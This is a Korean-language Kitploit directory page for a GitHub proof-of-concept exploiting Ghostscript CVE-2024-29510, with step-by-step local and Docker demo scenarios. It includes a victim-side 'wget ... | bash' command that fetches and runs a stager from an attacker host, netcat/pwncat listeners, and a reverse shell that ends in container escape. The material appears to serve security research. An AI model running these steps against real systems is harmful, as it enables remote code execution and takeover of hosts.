Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-29510 — CVE-2024-29510용 POC 코드 및 데모 VulnApp | Kitploit
도구/GitHubGitHub/swsmith2391/cve-2024-29510
Vulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentContainer EscapeBinary Exploitation
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

CVE-2024-29510용 POC 코드 및 데모 VulnApp

저장소 보기
112년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

원본 연구 및 POC 코드: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

참고: 실행된 명령 외에는 POC를 변경하지 않았습니다. 모든 공로는 놀라운 연구와 POC를 제공한 Codean Labs의 Thomas Rinsma에게 있습니다.

로컬 시나리오

  1. 스테이저 스크립트로 래핑되어 호스트 취약 여부를 확인하는 체크 스크립트를 다운로드 및 실행
  2. POC가 Python3 리버스 셸을 다운로드 및 실행하도록 수정됨
  3. 스테이저와 리버스 셸이 STDIN을 통해 다운로드 및 실행됨
  4. POC는 /tmp에 임의의 이름으로 아티팩트를 남김

공격자 호스트에서:

  1. pwncat-cs 또는 netcat을 사용하여 443 포트용 리스너 생성
  2. 익스플로잇 디렉터리로 이동
  3. python3 -m http.server 80

피해자 호스트(Ubuntu 23.10, Ghostscript 10.01.2 실행)에서:

  1. 터미널을 열고 다음을 실행: export RHOST=''; wget -q http://$RHOST/run -O - | bash &

원격 시나리오(VulnApp)

  1. 다음 명령으로 VulnApp 빌드: 'docker build -t cve-2024-29510-demo:latest .' (Dockerfile 디렉터리에 https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz 사본이 필요함)
  2. 다음 명령으로 VulnApp 실행: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. good.ps를 변환하여 기능 테스트. '>' 화살표를 그리는 선이 포함된 렌더링된 PDF를 반환해야 함
  4. shell.html을 호스팅하는 80 포트 웹 서버 설정(예: 'python3 -m http.server 80')
  5. pwncat-cs 또는 netcat을 사용하여 443 포트용 리스너 생성
  6. bad.eps 업로드, VulnApp이 멈추고 리스너가 컨테이너용 리버스 셸을 포착해야 함(root로 실행 중)
  7. 컨테이너 탈출!
도구 다운로드